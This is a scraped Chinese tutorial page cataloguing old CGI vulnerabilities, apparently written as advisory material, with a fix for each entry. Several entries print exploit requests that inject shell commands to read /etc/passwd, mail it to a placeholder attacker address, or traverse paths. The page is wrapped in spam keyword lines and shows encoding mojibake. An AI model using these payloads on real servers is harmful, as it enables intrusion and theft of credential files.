人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當(dāng)前位置:蘿卜系統(tǒng) > 網(wǎng)絡(luò)技術(shù)教程 > 詳細(xì)頁(yè)面

黑客攻防技術(shù)內(nèi)幕-入侵者攻擊辦法(10)

黑客攻防技術(shù)內(nèi)幕-入侵者攻擊辦法(10)

更新時(shí)間:2022-04-28 文章作者:未知 信息來(lái)源:網(wǎng)絡(luò) 閱讀次數(shù):

網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來(lái)的新技術(shù),它把互聯(lián)網(wǎng)上分散的資源融為有機(jī)整體,實(shí)現(xiàn)資源的全面共享和有機(jī)協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計(jì)算機(jī)、存儲(chǔ)資源、數(shù)據(jù)資源、信息資源、知識(shí)資源、專家資源、大型數(shù)據(jù)庫(kù)、網(wǎng)絡(luò)、傳感器等。 當(dāng)前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡(luò)則被認(rèn)為是互聯(lián)網(wǎng)發(fā)展的第三階段。
5.6 CGI漏洞攻擊(1)

    

5.6  CGI漏洞攻擊

以下收集和整理了一些著名的CGI漏洞,并提供了一些安全建議和解決方法,如果服務(wù)器存在這些漏洞不及時(shí)修補(bǔ)的話,每一個(gè)漏洞有可能將會(huì)補(bǔ)入侵者利用,加大服務(wù)器被攻擊的指數(shù)。

1. phf

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: NCSA 或者 Apache (1.1.1版本以內(nèi))非商業(yè)版本的Web Server中有一段程序util.c,允許入侵者以root身份執(zhí)行任何一個(gè)指令:

http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here

      解決方法: Apache web server升級(jí)到1.1.1以上,或者將NCSA web server升級(jí)到最新版本。

2. wguset.exe

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: 如果使用Windows NT做為WebServer操作系統(tǒng),而且wguest.exe存在于Web可執(zhí)行目錄中的話,入侵者將能利用它閱讀到硬盤(pán)上所有USR_<hostname>用戶能閱讀的文件。

解決方法: wguset.exeWeb目錄中移走或刪除

3. rguset.exe

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: 如果使用Windows NT做為WebServer的操作系統(tǒng),而且rguest.exe存在于Web可執(zhí)行目錄中的話,入侵者將能利用它閱讀到服務(wù)器硬盤(pán)上所有USR_<hostname>用戶能閱讀的文件。

      解決方法: rguset.exeWeb目錄中移走或刪除。

4. perl.exe

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: cgi-bin執(zhí)行目錄下存在perl.exe,這屬于嚴(yán)重的配置錯(cuò)誤。入侵者可以在perl.exe后面加一串指令,利用瀏覽器在server上執(zhí)行任何腳本程序。

      解決方法: Web目錄下移除perl.exe這個(gè)程序。

5. shtml.exe

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: 如果使用Front Page作為WebServer,那么入侵者能夠利用IUSR_ <lt;hostname>用戶和shtml.exe入侵戶用的機(jī)器。

      解決方法: shtml.exeWeb目錄移走或刪除。

6. wwwboard.pl

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: wwwboard.pl程序容易引起攻擊者對(duì)服務(wù)器進(jìn)行D.O.S攻擊。

      建議: 如無(wú)必要可以刪除該文件。

      解決方法: get_variables的子程序中的下面這段:

if ($FORM{"followup"}) { $followup = "1"

@followup_num = split(/,/,$FORM{"followup"});

$num_followups = @followups = @followup_num;

$last_message = pop(@followups);

$origdate = "$FORM{"origdate"}"

$origname = "$FORM{"origname"}"

$origsubject = "$FORM{"origsubject"}" }

替換為:

if ($FORM{"followup"}) {

$followup = "1"

@followup_num = split(/,/,$FORM{"followup"});

$num_followups = @followups = @followup_num;

$last_message = pop(@followups);

$origdate = "$FORM{"origdate"}"

$origname = "$FORM{"origname"}"

$origsubject = "$FORM{"origsubject"}"

# WWWBoard Bomb Patch

# Written By: Samuel Sparling sparling@slip.net)

$fn=0;

while($fn < $num_followups)

{

$cur_fup = @followups $fn];

$dfn=0;

foreach $fm(@followups)

{

if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)

{

&error(board_bomb);

}

$dfn++;

}

$fn++;

}

# End WWWBoard Bomb Patch

}

7. uploader.exe

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: 如果使用Windows NT作為WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件。

      解決方法: uploader.exeWeb目錄移走或刪除。

8. bdir.htr

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: 如果使用Windows NT做為WebServer的操作系統(tǒng),而且bdir.htr存在于Web可執(zhí)行目錄中的話,入侵者將能利用它在服務(wù)器上無(wú)止境的創(chuàng)建ODBC數(shù)據(jù)庫(kù),并生成一些可執(zhí)行的文件。

      解決方法: bdir.htrWeb目錄移走或刪除。

9. Count.cgi

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: /cgi-bin目錄下的Count.cgi程序(Wwwcount2.3版本)有一個(gè)溢出錯(cuò)誤,允許入侵者無(wú)須登錄而遠(yuǎn)程執(zhí)行任何指令。

      建議: 如無(wú)必要可以刪除該文件。

      解決方法: Wwwcount升級(jí)到2.4或者以上。

10. test-cgi

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: test-cgi這個(gè)文件可以被入侵者用來(lái)瀏覽服務(wù)器上的重要信息。

      建議: 建議審核cgi-bin目錄下的執(zhí)行程序,嚴(yán)格控制訪問(wèn)權(quán)限。

      解決方法: 刪除test-cgi文件。

11. nph-test-cgi

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: nph-test-cgi這個(gè)文件可以被入侵者用來(lái)瀏覽服務(wù)器上的重要信息。

      建議: 建議審核cgi-bin目錄下的執(zhí)行程序,嚴(yán)格控制訪問(wèn)權(quán)限。

      解決方法: 刪除nph-test-cgi文件。

12. php.cgi

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: php.cgi程序有較多的漏洞,包括緩存溢出漏洞,還有導(dǎo)致任何系統(tǒng)文件可以被入侵者讀取的漏洞。

      建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。

      解決方法: 刪除php.cgi程序是最好的辦法。

13. handler

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: IRIX 5.36.26.36.4/cgi-bin/handler程序存在緩存溢出錯(cuò)誤,允許入侵者在server上遠(yuǎn)程執(zhí)行如下程序:

telnet target.machine.com 80

GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download

HTTP/1.0

      建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。

      解決方法: 刪除handler文件。

14. webgais

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: /cgi-bin,目錄下的webgaisGAIS搜索工具的一個(gè)接口,它有一個(gè)漏洞使入侵者可以繞過(guò)程序的安全機(jī)制,執(zhí)行系統(tǒng)命令:

POST /cgi-bin/webgais HTTP/1.0

Content-length: 85 (replace this with the actual length of the "exploit" line)

telnet target.machine.com 80

query="mail+you\@your.host</etc/passwd;echo"&output=subject&domain=paragraph

      建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。

      解決方法: 刪除webgais文件。

15. websendmail

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: /cgin-bin目錄下的websendmail程序允許入侵者執(zhí)行一個(gè)系統(tǒng)指令:

telnet target.machine.com 80

POST /cgi-bin/websendmail HTTP/1.0

Content-length: xxx (should be replaced with the actual length of the stri

ng passed to the server, in this case xxx=90)

receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a&rtnaddr=a

&subject=a

&content=a

      建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。

      解決方法: 高級(jí)用戶可以編輯websendmail腳本,過(guò)濾特殊字符。一般用戶則刪除websendmail文件。

16. webdist.cgi

      類型:攻擊型

      風(fēng)險(xiǎn)等級(jí):高

      描述:對(duì)于Irix6.26.3平臺(tái),/cgi-bin目錄下的webdist.cgi有一個(gè)弱點(diǎn)允許入侵者無(wú)須登錄而在系統(tǒng)上執(zhí)行任何指令:

http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

      建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。

      解決方法: 刪除/var/www/cgi-bin/webdist.cgi目錄下的webdist.cgi

17. faxsurvey

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: Linux S.u.S.E/cgi-bin目錄下的faxsurvey程序允許入侵者無(wú)須登錄就能在服務(wù)器執(zhí)行指令:

http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

      建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。

      解決方法: 刪除/cgi-bin/faxsurvey文件。

18. htmlscript

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: 安裝了htmlscript2.99x或者更早版本的服務(wù)器,存在一個(gè)漏洞使入侵者可以查看服務(wù)器上的任何文件:

http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd

      建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。

      解決方法: 刪除/cgi-bin/htmlscript腳本文件,或者將htmlscript升級(jí)到3.0以上。

19. pfdisplay

      類型: 攻擊型

      風(fēng)險(xiǎn)等級(jí):

      描述: Irix6.4或者更早版本的Web服務(wù)器上,/cgi-bin/pfdisplay程序允許入侵者非法查看服務(wù)器上的文件。

      建議: 建議審核cgi-bin目錄,避免有不必要的程序存在。

      解決方法: 刪除/cgi-bin/pfdisplay文件,或者打補(bǔ)丁程序。

補(bǔ)丁程序可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下載:

Filename: README.patch.3018

Algorithm #1 (sum -r): 37955 11 README.patch.3018

Algorithm #2 (sum): 15455 11 README.patch.3018

MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69

Filename: patchSG0003018

Algorithm #1 (sum -r): 01679 2 patchSG0003018

Algorithm #2 (sum): 12876 2 patchSG0003018

MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8

Filename: patchSG0003018.idb

Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb

Algorithm #2 (sum): 251 2 patchSG0003018.idb

MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename: patchSG0003018.performer_tools_man

Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man

Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man

MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29

Filename: patchSG0003018.performer_tools_sw

Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw

Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw

MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F



網(wǎng)絡(luò)的神奇作用吸引著越來(lái)越多的用戶加入其中,正因如此,網(wǎng)絡(luò)的承受能力也面臨著越來(lái)越嚴(yán)峻的考驗(yàn)―從硬件上、軟件上、所用標(biāo)準(zhǔn)上......,各項(xiàng)技術(shù)都需要適時(shí)應(yīng)勢(shì),對(duì)應(yīng)發(fā)展,這正是網(wǎng)絡(luò)迅速走向進(jìn)步的催化劑。

溫馨提示:喜歡本站的話,請(qǐng)收藏一下本站!

本類教程下載

系統(tǒng)下載排行

網(wǎng)站地圖xml | 網(wǎng)站地圖html
主站蜘蛛池模板: 铁岭县| 松阳县| 大城县| 深泽县| 榕江县| 秦皇岛市| 镇坪县| 安义县| 渝中区| 赞皇县| 凌云县| 达州市| 喜德县| 宁津县| 浦东新区| 湖南省| 卓资县| 阿勒泰市| 遵化市| 九龙坡区| 织金县| 红河县| 漳州市| 蚌埠市| 蓬溪县| 湘阴县| 勃利县| 昭觉县| 濮阳市| 日喀则市| 南岸区| 广安市| 安龙县| 灵寿县| 柏乡县| 鱼台县| 锦屏县| 长沙市| 章丘市| 建昌县| 靖宇县|